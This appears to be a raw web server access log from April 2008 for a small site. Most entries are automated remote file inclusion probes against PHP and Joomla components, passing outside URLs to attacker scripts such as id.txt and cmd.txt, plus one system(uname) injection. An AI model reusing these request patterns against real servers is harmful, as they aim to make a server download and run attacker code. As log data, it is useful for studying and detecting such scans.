58.120.225.104 - - [08/Apr/2008:09:50:01 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:50:01 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:50:01 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:50:27 -0700] "GET /logs/access_071220.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:50:36 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:09:51:00 -0700] "GET //config/dbutil.bck.php?confdir=http://geocities.com/s.memek/Mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.16 - - [08/Apr/2008:09:51:34 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:51:34 -0700] "GET /logs/access_080308.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.18.192.224 - - [08/Apr/2008:09:52:50 -0700] "GET /logs/access_080215.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.18.192.224 - - [08/Apr/2008:09:52:50 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.18.192.224 - - [08/Apr/2008:09:52:50 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:53:08 -0700] "GET /logs/access_080119.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.48.204.130 - - [08/Apr/2008:09:53:14 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
189.236.5.128 - - [08/Apr/2008:09:53:27 -0700] "GET /logs/access_080223.log/joomla/index.php?option=com_restaurante&task=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.34.218 - - [08/Apr/2008:09:54:04 -0700] "GET //inc/cmses/aedatingCMS.php?dir[inc]=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
85.214.34.218 - - [08/Apr/2008:09:54:04 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir[inc]=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:54:05 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:54:05 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:54:05 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:54:16 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:54:47 -0700] "GET /logs/access_080119.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.93.56.80 - - [08/Apr/2008:09:55:03 -0700] "GET /logs/access_080306.log/admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/dokter/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [08/Apr/2008:09:55:03 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/dokter/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [08/Apr/2008:09:55:04 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/dokter/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:09:55:18 -0700] "GET /logs/access_080308.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.67.238.88 - - [08/Apr/2008:09:55:21 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:55:22 -0700] "GET /logs/access_080329.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.218.206.37 - - [08/Apr/2008:09:55:50 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://campexpedition.net/galerias/backups/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.218.206.37 - - [08/Apr/2008:09:55:56 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://campexpedition.net/galerias/backups/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.218.206.37 - - [08/Apr/2008:09:55:56 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://campexpedition.net/galerias/backups/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.218.206.37 - - [08/Apr/2008:09:56:01 -0700] "GET /logs/access_080127.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://campexpedition.net/galerias/backups/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.218.206.37 - - [08/Apr/2008:09:56:01 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://campexpedition.net/galerias/backups/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.218.206.37 - - [08/Apr/2008:09:56:08 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://campexpedition.net/galerias/backups/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:09:56:08 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:09:56:08 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:09:56:08 -0700] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:09:56:08 -0700] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:09:56:09 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:09:56:09 -0700] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:09:56:11 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:09:56:16 -0700] "GET /convert/mvcw.php?vwar_root=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:09:56:17 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:56:18 -0700] "GET /logs/access_080222.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:09:56:26 -0700] "GET /logs/access_080126.log//matic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:09:56:27 -0700] "GET //matic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:09:56:27 -0700] "GET /logs//matic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:56:36 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.214.34.218 - - [08/Apr/2008:09:56:45 -0700] "GET //claroline/exercice/testheaderpage.php?rootSys=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
85.214.34.218 - - [08/Apr/2008:09:56:45 -0700] "GET /logs//claroline/exercice/testheaderpage.php?rootSys=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:09:57:07 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:09:57:44 -0700] "GET /logs/access_080126.log//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:09:57:49 -0700] "GET //tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:09:57:54 -0700] "GET /logs//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.16 - - [08/Apr/2008:09:58:07 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:58:31 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.93.56.80 - - [08/Apr/2008:09:58:49 -0700] "GET /logs/access_080313.log/admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/dokter/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:10:00:57 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:10:01:03 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:10:01:09 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.20.46.121 - - [08/Apr/2008:10:01:45 -0700] "GET /logs/access_080306.log/admin/classes/TplLoad.php?full_path_to_public_program=http://www.mysticmysfits.com/smf/avatars/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.20.46.121 - - [08/Apr/2008:10:01:45 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.mysticmysfits.com/smf/avatars/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.20.46.121 - - [08/Apr/2008:10:01:46 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://www.mysticmysfits.com/smf/avatars/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:10:03:57 -0700] "GET /logs/access_080106.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.214.34.218 - - [08/Apr/2008:10:04:02 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
85.214.34.218 - - [08/Apr/2008:10:04:02 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:10:04:08 -0700] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:10:04:33 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.218.206.37 - - [08/Apr/2008:10:04:52 -0700] "GET /logs/access_080313.log//components/com_simpleboard/image_upload.php?sbp=http://campexpedition.net/galerias/backups/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:10:05:53 -0700] "GET /logs/access_080223.log//encapscms_PATH/core/core.php?root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:10:05:53 -0700] "GET //encapscms_PATH/core/core.php?root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:10:05:53 -0700] "GET /logs//encapscms_PATH/core/core.php?root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.111 - - [08/Apr/2008:10:05:59 -0700] "GET /logs//index.php?option=frontpage&Itemid=system(uname)http://www.eenpotnat.com/modules/poll/me.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
91.185.193.111 - - [08/Apr/2008:10:06:02 -0700] "GET //index.php?option=frontpage&Itemid=system(uname)http://www.eenpotnat.com/modules/poll/me.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:10:06:23 -0700] "GET /logs/access_080329.log//encapscms_PATH/core/core.php?root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.20.46.121 - - [08/Apr/2008:10:06:26 -0700] "GET /logs/access_080313.log/admin/classes/TplLoad.php?full_path_to_public_program=http://www.mysticmysfits.com/smf/avatars/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.72.190.136 - - [08/Apr/2008:10:06:30 -0700] "GET /presto/ HTTP/1.1" 200 526 "http://home.earthlink.net/~infernofilecabinet2/XpSetupsF_J/JourneyPII_Setup.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hotbar 10.0.368.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
77.221.130.3 - - [08/Apr/2008:10:06:34 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/finkel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.72.190.136 - - [08/Apr/2008:10:06:40 -0700] "GET / HTTP/1.1" 200 7371 "http://www.dmulk.com/presto/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hotbar 10.0.368.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
83.72.190.136 - - [08/Apr/2008:10:06:41 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9037 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hotbar 10.0.368.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "dmulk.com"
83.72.190.136 - - [08/Apr/2008:10:06:41 -0700] "GET /blog/wp-content/uploads/2008/04/crestoc07-3.jpg HTTP/1.1" 200 51084 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hotbar 10.0.368.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "dmulk.com"
83.72.190.136 - - [08/Apr/2008:10:06:42 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hotbar 10.0.368.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "dmulk.com"
83.72.190.136 - - [08/Apr/2008:10:06:42 -0700] "GET /blog/wp-content/themes/default/images/kubrickbg.jpg HTTP/1.1" 200 1043 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hotbar 10.0.368.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "dmulk.com"
83.72.190.136 - - [08/Apr/2008:10:06:42 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hotbar 10.0.368.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "dmulk.com"
83.72.190.136 - - [08/Apr/2008:10:06:43 -0700] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hotbar 10.0.368.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "dmulk.com"
211.21.48.203 - - [08/Apr/2008:10:07:18 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:10:08:00 -0700] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:10:08:02 -0700] "GET /index.php?option=com_custompages&cpage=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:10:08:02 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.133.62 - - [08/Apr/2008:10:08:56 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.208.111.178 - - [08/Apr/2008:10:09:00 -0700] "GET /logs/access_080106.log//admin.php?include_path=http://h1.ripway.com/kclarkes/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.111.178 - - [08/Apr/2008:10:09:00 -0700] "GET //admin.php?include_path=http://h1.ripway.com/kclarkes/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.111.178 - - [08/Apr/2008:10:09:00 -0700] "GET /logs//admin.php?include_path=http://h1.ripway.com/kclarkes/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.111.178 - - [08/Apr/2008:10:09:38 -0700] "GET /logs/access_080123.log//admin.php?include_path=http://h1.ripway.com/kclarkes/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:10:09:46 -0700] "GET /logs/access_080329.log/index.php?option=com_custompages&cpage=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:10:10:12 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:10:12:19 -0700] "GET /logs/access_080214.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:10:12:22 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:10:12:30 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.9.54 - - [08/Apr/2008:10:12:58 -0700] "GET /plans/?D=A HTTP/1.0" 200 1095 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.209.207 - - [08/Apr/2008:10:14:03 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.207 - - [08/Apr/2008:10:14:03 -0700] "GET /_private/ HTTP/1.1" 403 163 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.207 - - [08/Apr/2008:10:14:05 -0700] "GET /drop/ HTTP/1.1" 401 395 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.207 - - [08/Apr/2008:10:14:05 -0700] "GET /mobilehackers/ HTTP/1.1" 401 395 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
62.75.214.214 - - [08/Apr/2008:10:14:18 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.scadi.cl/.setan/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.214.214 - - [08/Apr/2008:10:14:18 -0700] "GET //skin/zero_vote/error.php?dir=http://www.scadi.cl/.setan/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.214.214 - - [08/Apr/2008:10:14:18 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.scadi.cl/.setan/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.214.34.218 - - [08/Apr/2008:10:14:40 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
85.214.34.218 - - [08/Apr/2008:10:14:43 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
80.93.62.97 - - [08/Apr/2008:10:15:34 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/reyen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
